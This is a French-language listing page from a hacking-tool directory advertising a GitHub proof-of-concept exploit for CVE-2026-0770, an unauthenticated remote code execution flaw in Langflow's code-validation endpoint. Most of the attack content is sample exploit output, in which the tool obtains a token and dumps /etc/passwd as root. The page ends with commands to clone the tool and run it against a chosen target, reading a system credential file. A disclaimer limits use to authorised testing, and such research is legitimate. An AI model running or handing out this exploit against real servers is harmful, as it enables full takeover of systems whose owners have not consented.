Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-0770 — LangFlow RCE | CVE-2026-0770 | Preuve de concept | Kitploit
Outils/GitHubGitHub/ez4rd1x1/cve-2026-0770
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRed Teaming
GitHubez4rd1x1/cve-2026-0770

CVE-2026-0770

LangFlow RCE | CVE-2026-0770 | Preuve de concept

Voir le dépôt
il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-0770 : Langflow exec_globals Exécution de code à distance non authentifiée (PoC)

CVE Score: 9.8 Python Version

CVE-2026-0770 est une vulnérabilité d'exécution de code à distance (RCE) non authentifiée affectant Langflow.

La faille provient d'une validation d'entrée incorrecte dans la gestion du paramètre exec_globals fourni au point de terminaison /validate. En exploitant cela, un attaquant peut transmettre des environnements globaux non fiables lors des routines de validation, obtenant une exécution de code à distance dans le contexte de l'utilisateur root.


[!] Avertissement

AVERTISSEMENT : Cet outil est destiné uniquement aux tests de sécurité autorisés, à des fins éducatives et à la recherche défensive. Ne l'exécutez pas contre des cibles que vous ne possédez pas ou pour lesquelles vous n'avez pas d'autorisation écrite explicite. L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par ce script.

Télécharger l’outil

Détails de la vulnérabilité

  • ID CVE : CVE-2026-0770
  • Type de vulnérabilité : Inclusion de fonctionnalités provenant d'une sphère de contrôle non fiable (CWE-829) / Injection de code
  • Logiciel concerné : Langflow (versions antérieures au correctif)
  • Impact : Compromission totale du système (RCE en tant que root)
  • Privilèges requis : Aucun (non authentifié)

Sortie

root@kitploit:~

======================================================================
           Langflow RCE Exploit - CVE-2026-0770 - Zardy1x1            
======================================================================
Target : http://192.168.1.9:7860
Command: cat /etc/passwd
======================================================================
[*] attempt login...
[+] auto-login successful!
[~] token acquired: eyJhbGciOiJIUzI1NiIs...
[*] target command: cat /etc/passwd
[~] payload contructed
[~] sending request to http://192.168.1.9:7860/api/v1/validate/code
[*] receive status code: 200

======================================================================
COMMAND OUTPUT
======================================================================
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
user:x:1000:0::/app/data:/bin/sh
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:996:996:System Message Bus:/nonexistent:/usr/sbin/nologin
======================================================================

Status Code : 200
Response Size: 1244 bytes

Installation et utilisation

root@kitploit:~
git clone https://github.com/Ez4rd1x1/CVE-2026-0770
cd CVE-2026-0770
python3 exp_v3.py -t http://target:port -c "cat /etc/passwd"